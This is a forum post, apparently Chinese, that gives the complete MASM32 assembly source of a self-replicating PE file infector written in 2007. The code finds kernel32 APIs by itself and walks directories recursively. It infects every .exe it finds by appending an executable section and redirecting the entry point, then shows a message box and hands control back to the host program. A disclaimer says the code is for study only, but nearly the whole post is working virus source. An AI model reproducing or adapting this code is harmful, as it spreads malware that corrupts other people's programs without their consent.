以前写的一个程序了 看有人需要就发上来了 很基础的东西了
;*********************************************************
;作者:hfyy
;日期:2007-8-29
;程序功能:感染当前文件夹及其子文件夹内的exe文件,插入一个消息框
;注意事项:如欲转载,请保持本程序的完整
; 在此特别声明
; 本程序只供学习研究,切勿用于非法途径
;*********************************************************
;由于部分代码借鉴与网络上的一些教程,特此感谢
;*********************************************************
.386
.model flat,stdcall
option casemap:none
include windows.inc
.code
;###############插入代码############################
start:
jmp VBegin
VStart:
k32Base dd ? ;kernel32基址
HostEntry dd ? ;宿主程序原程序入口
;#############################################
sGetModuleHandle db "GetModuleHandleA",0
sGetProcAddress db "GetProcAddress",0
sExitProcess db "ExitProcess",0
sLoadLibrary db "LoadLibraryA",0
sCreateFile db "CreateFileA",0
sCreateFileMapping db "CreateFileMappingA",0
sMapViewOfFile db "MapViewOfFile",0
sUnmapViewOfFile db "UnmapViewOfFile",0
sCloseHandle db "CloseHandle",0
sSetFilePointer db "SetFilePointer",0
sSetEndOfFile db "SetEndOfFile",0
sWriteFile db "WriteFile",0
sGetCurrentDirectory db 'GetCurrentDirectoryA',0
sSetCurrentDirectory db 'SetCurrentDirectoryA',0
sFindFirstFile db 'FindFirstFileA',0
sFindNextFile db 'FindNextFileA',0
sFindClose db 'FindClose',0
sCreateThread db 'CreateThread',0
slstrcpy db 'lstrcpy',0
slstrcat db 'lstrcat',0
slstrlen db 'lstrlen',0
slstrcmpi db 'lstrcmpi',0
sMessageBoxA db "MessageBoxA",0
aGetModuleHandle dd 0
aGetProcAddress dd 0
aExitProcess dd 0
aLoadLibrary dd 0
aCreateFile dd 0
aCreateFileMapping dd 0
aMapViewOfFile dd 0
aUnmapViewOfFile dd 0
aCloseHandle dd 0
aSetFilePointer dd 0
aSetEndOfFile dd 0
aWriteFile dd 0
aGetCurrentDirectory dd 0
aSetCurrentDirectory dd 0
aFindFirstFile dd 0
aFindNextFile dd 0
aFindClose dd 0
aCreateThread dd 0
alstrcpy dd 0
alstrcat dd 0
alstrlen dd 0
alstrcmpi dd 0
aMessageBoxA dd 0
buffer db 1024 dup (?)
u32 db "User32.dll",0
k32 db "Kernel32.dll",0
;filename db "f:/abc" ,0;添加目标文件
szMsg db "我进来了,呵呵!",0
sztitle db "by hfyy",0
filter db '*.*',0
nextdir db '\',0
wfd WIN32_FIND_DATA <0>
ext db '.exe',0
self db 'yy_2.exe',0
windir db 'c:\windows',0
threadId dd 0
write db 0
lpApiAddrs label near
dd offset sGetModuleHandle
dd offset sGetProcAddress
dd offset sExitProcess
dd offset sLoadLibrary
dd offset sCreateFile
dd offset sCreateFileMapping
dd offset sMapViewOfFile
dd offset sUnmapViewOfFile
dd offset sCloseHandle
dd offset sSetFilePointer
dd offset sSetEndOfFile
dd offset sWriteFile
dd offset sGetCurrentDirectory
dd offset sSetCurrentDirectory
dd offset sFindFirstFile
dd offset sFindNextFile
dd offset sFindClose
dd offset sCreateThread
dd offset slstrcpy
dd offset slstrcat
dd offset slstrlen
dd offset slstrcmpi
dd 0
;################获取api#########################################################
GetApiA proc Base:DWORD,sApi:DWORD
local @dwStringLength
local @return
pushad
;#############计算api的长度#########################
mov edi,sApi
mov ecx,-1
xor al,al
cld
repnz scasb
mov ecx,edi
sub ecx,sApi
mov @dwStringLength,ecx
;####################################
mov esi,Base
add esi,[esi+3ch]
mov esi,[esi+78h];[edi+IMAGE_NT_HEADERS.OptionalHeader.DataDirectory.VirtualAddress]
add esi,Base;得到edi=IMAGE_EXPORT_DIRECTORY入口
mov ebx,[esi+20h];AddressOfNames
add ebx,Base
xor edx,edx
next: ;得到匹配函数的AddressOfNames数组中的RVA
push esi
mov esi,sApi
mov edi,[ebx]
add edi,Base
mov ecx,@dwStringLength
repz cmpsb
jnz goon
pop esi
jmp found
goon: pop esi
add ebx,4
inc edx
cmp edx,[esi+18h]
jb next
found:
sub ebx,[esi+20h];AddressOfNames
sub ebx,Base
shr ebx,1 ;AddressOfNameOrdinals是word数组,所以RVA应该除以2来求出AddressOfNameOrdinals的RVA
add ebx,[esi+24h];AddressOfNameOrdinals
add ebx,Base
movzx eax,word ptr [ebx];AddressOfNameOrdinals是word数组
;mov eax,edx
shl eax,2 ;AddressOfName是dword数组,所以序号应该乘以4个字节
add eax,[esi+1ch];AddressOfFunctions
add eax,Base
mov eax,[eax]
add eax,Base
mov @return,eax
popad
mov eax,@return
ret
GetApiA endp
;################感染过程###################################################################
InfectFile proc _filename:dword
local hFile
local hMapping
local pMapping
;重定位
call @F
@@: pop ebx
sub ebx,offset @B
;#######################打开文件##########################################################
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ+FILE_SHARE_WRITE
push GENERIC_READ+GENERIC_WRITE
push _filename
call [ebx+aCreateFile]
inc eax
je exit2
dec eax
;.if eax == INVALID_HANDLE_VALUE
; jmp exit2
;.endif
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov hFile,eax
push 0
push 0
push 0
push PAGE_READWRITE
push NULL
push hFile
call [ebx+aCreateFileMapping]
mov hMapping,eax
push 0
push 0
push 0
push FILE_MAP_READ+FILE_MAP_WRITE
push hMapping
call [ebx+aMapViewOfFile]
mov pMapping,eax
push ebx
;########################找到pe头#########################################################
mov esi,eax
assume esi:ptr IMAGE_DOS_HEADER
cmp word ptr [esi],IMAGE_DOS_SIGNATURE
jnz Exit
add esi,[esi].e_lfanew
assume esi:ptr IMAGE_NT_HEADERS
cmp dword ptr [esi],IMAGE_NT_SIGNATURE
jnz Exit
cmp dword ptr [esi+8],'hfyy'
je Exit
mov dword ptr [esi+8],'hfyy'
;#######################添加新节##########################################################
mov eax,[esi].OptionalHeader.AddressOfEntryPoint
add eax,[esi].OptionalHeader.ImageBase
mov [ebx+HostEntry],eax ;保存原程序入口地址
;判断是否能够有空间插入新节表
movzx eax,[esi].FileHeader.NumberOfSections
mov ecx,sizeof IMAGE_SECTION_HEADER
mul ecx
add eax,sizeof IMAGE_NT_HEADERS
add eax,esi
mov edi,eax
add eax,sizeof IMAGE_SECTION_HEADER
sub eax,pMapping
cmp eax,[esi].OptionalHeader.SizeOfHeaders
ja Exit
;添加新节,edi为新节
inc [esi].FileHeader.NumberOfSections
mov ebx,edi
sub ebx,28h
assume edi:ptr IMAGE_SECTION_HEADER ;新节
assume ebx:ptr IMAGE_SECTION_HEADER ;上一节
mov dword ptr[edi],'fh.'
;#########################################################
;VirtualSize等于插入代码按SectionAlignment值对齐
push offset VEnd-offset VStart
pop [edi].Misc.VirtualSize
;SizeOfRawData=插入代码长度按FileAlignment值对齐
mov eax,[edi].Misc.VirtualSize
mov ecx,[esi].OptionalHeader.FileAlignment
div ecx
.if edx
inc eax
.endif
mul ecx
mov [edi].SizeOfRawData,eax
;PointerToRawData
mov eax,[ebx].PointerToRawData ;上一节的PointerToRawData
cmp eax,0
jnz next
lea eax,[ebx-28h+14h] ;上上节的PointerToRawData
mov eax,[eax]
lea ecx,[ebx-28h+10h]
mov ecx,[ecx]
add eax,ecx ;上上节的SizeOfRawData
jmp go_on
next: add eax,[ebx].SizeOfRawData ;上一节的SizeOfRawData
go_on: mov [edi].PointerToRawData,eax ;PointerToRawData=前两个值相加
mov [edi].Characteristics,0E0000020h ;节属性设置为可读可写可执行
mov eax,[ebx].Misc.VirtualSize
mov ecx,[esi].OptionalHeader.SectionAlignment
xor edx,edx
div ecx
test edx,edx
je @F
inc eax
;.if edx
; inc eax
;.endif
@@: mul ecx
add eax,[ebx].VirtualAddress
mov [edi].VirtualAddress,eax
;############修改入口地址################################################
;push [edi].VirtualAddress
;pop [esi].OptionalHeader.AddressOfEntryPoint
mov eax,[edi].VirtualAddress
add eax,(offset VBegin-offset VStart)
mov [esi].OptionalHeader.AddressOfEntryPoint,eax
;更新SizeOfImage
mov eax,[edi].Misc.VirtualSize
mov ecx,[esi].OptionalHeader.SectionAlignment
xor edx,edx
div ecx
.if edx
inc eax
.endif
mul ecx
add [esi].OptionalHeader.SizeOfCode,eax
add [esi].OptionalHeader.SizeOfImage,eax
;mov [esi].OptionalHeader.SizeOfImage,eax
;写入新节
pop ebx
push FILE_BEGIN
push 0
push [edi].PointerToRawData
push hFile
call [ebx+aSetFilePointer]
;#######################################
push 0
lea eax,[ebx+write]
push eax
push [edi].Misc.VirtualSize
lea eax,[ebx+VStart]
push eax
push hFile
call [ebx+aWriteFile]
mov eax,[edi].PointerToRawData
add eax,[edi].SizeOfRawData
push FILE_BEGIN
push 0
push eax
push hFile
call [ebx+aSetFilePointer]
push hFile
call [ebx+aSetEndOfFile]
;########################结束#############################################################
Exit: push pMapping
call [ebx+aUnmapViewOfFile]
push hMapping
call [ebx+aCloseHandle]
exit2: push hFile
call [ebx+aCloseHandle]
ret
InfectFile endp
;#########################遍历当前文件夹及子文件夹#################################################################
FindFile proc DirPath
local hSearch:DWORD
local DirFile[MAX_PATH]:DWORD
pushad
;重定位
call @F
@@: pop ebx
sub ebx,offset @B
;判断是否是c:\windows目录
lea esi,[offset windir+ebx]
mov edi,DirPath
xor ecx,ecx
mov cx,10
cld
repz cmpsb
jz ED_Exit
;开始遍历
push DirPath
lea esi,DirFile
push esi
call [ebx+alstrcpy]
push esi;当前目录
call [ebx+aSetCurrentDirectory]
lea edi,[offset wfd+ebx]
push edi
lea eax,[offset filter+ebx]
push eax
call [ebx+aFindFirstFile]
cmp eax,INVALID_HANDLE_VALUE
jz ED_Exit
mov hSearch,eax
.repeat
mov eax,DWORD ptr [offset wfd+ebx]
and eax,FILE_ATTRIBUTE_DIRECTORY
.if eax == FILE_ATTRIBUTE_DIRECTORY
.if byte ptr [wfd+44+ebx]!='.'
push DirPath
lea esi,DirFile
push esi
call [ebx+alstrcpy]
lea eax,[offset nextdir+ebx]
push eax
push esi
call [ebx+alstrcat]
lea eax,[offset wfd+44+ebx]
push eax
push esi
call [ebx+alstrcat]
push esi
call FindFile
.endif
.else
.if byte ptr [wfd+44+ebx]!='.'
pushad
lea eax,[offset wfd+44+ebx]
push eax
call [ebx+alstrlen]
sub eax,4
mov esi,eax ;esi=扩展名位置
lea edx,[offset ext+ebx]
push edx
lea eax,wfd.cFileName[esi]
add eax,ebx
push eax
call [ebx+alstrcmpi]
cmp eax,0
jnz j1
push DirPath
lea esi,DirFile
push esi
call [ebx+alstrcpy]
lea eax,[offset nextdir+ebx]
push eax
push esi
call [ebx+alstrcat]
lea eax,[offset wfd+44+ebx]
lea edx,[offset self+ebx]
push eax
push edx
call [ebx+alstrcmpi]
cmp eax,0
jz j1
lea eax,[offset wfd+44+ebx]
push eax
push esi
call [ebx+alstrcat]
push esi
call InfectFile
j1:
popad
.endif
.endif
push edi
push hSearch
call [ebx+aFindNextFile]
.until eax == 0
ED_Close:
push hSearch
call [ebx+aFindClose]
ED_Exit:
popad
ret
FindFile endp
;################搜索kernel32基址#####################################################
GetKernelBase proc
assume fs:nothing
mov esi,fs:[0]
lodsd
retry:
inc eax
je @F
dec eax
xchg esi,eax
lodsd ;next seh_frame
jmp retry
@@:
lodsd
mov ecx,eax
;mov ecx,[esp]
;xor edx,edx
and ecx,0FFFF0000h
getK32:
sub ecx,010000h
cmp word ptr [ecx],IMAGE_DOS_SIGNATURE
jnz getK32
mov esi,ecx
assume esi:ptr IMAGE_DOS_HEADER
add esi,[esi].e_lfanew
cmp dword ptr [esi],IMAGE_NT_SIGNATURE
jnz getK32
mov eax,ecx
ret
GetKernelBase endp
;###############线程函数############################################################################
ThreadProc proc
pushad
call @F
@@: pop ebx
sub ebx,offset @B
lea eax,[offset buffer+ebx]
push eax
push 128
call [ebx+aGetCurrentDirectory]
lea eax,[offset buffer+ebx]
push eax
call FindFile
popad
ret
ThreadProc endp
;###############程序真正入口点######################################################
VBegin:
call @F
@@:
pop ebp
sub ebp,offset @B ;重定位
;################搜索kernel32基址#####################################################
call GetKernelBase
mov [ebp+offset k32Base],eax
;#######################################################################################
lea edi,[ebp+aGetModuleHandle]
lea esi,[ebp+lpApiAddrs]
loop_get:
lodsd
cmp eax,0
jz End_Get
add eax,ebp
push eax
push dword ptr [ebp+offset k32Base]
call GetApiA ;获取API地址
stosd
jmp loop_get
End_Get:
;lea eax,[ebp+filename]
;push eax
;call InfectFile ;感染文件
;lea eax,[offset buffer+ebp]
;push eax
;push 128
;call [ebp+aGetCurrentDirectory]
;lea eax,[offset buffer+ebp]
;push eax
;call FindFile
;插入个messagebox表明感染成功
;###############启动个线程###########################################################################
lea eax,[ebp+offset threadId]
push eax
push NULL
push NULL
lea eax,[ebp+offset ThreadProc]
push eax
push NULL
push NULL
call [ebp+aCreateThread]
;###################################################################################################
lea edx,[ebp+u32]
push edx
call [ebp+aLoadLibrary] ;在程序空间加载User32.dll
lea edx,[ebp+sMessageBoxA]
push edx
push eax
mov eax,dword ptr [ebp+aGetProcAddress] ;用GetProcAddress获得MessageBoxA的地址
call eax ;调用GetProcAddress
push 40h+1000h ;style
lea ecx,[ebp+offset sztitle]
push ecx ;title
lea edx,[ebp+offset szMsg]
push edx ;消息内容
push 0
call eax
;###############判断是否是启动程序,如果是则结束,如果是宿主则返回宿主程序##################
push 0
call [ebp+aGetModuleHandle]
mov esi,eax
assume esi:ptr IMAGE_DOS_HEADER
add esi,[esi].e_lfanew
cmp dword ptr [esi+8],'hfyy'
je host
jmp exit
;################返回原程序入口###################################################
host: xor eax,eax
add eax,[ebp+HostEntry]
jmp eax
;########################结束#############################################################
exit:
push 0
call [ebp+aExitProcess]
VEnd:
;######################################################
end start
[课程]Android-CTF解题方法汇总!
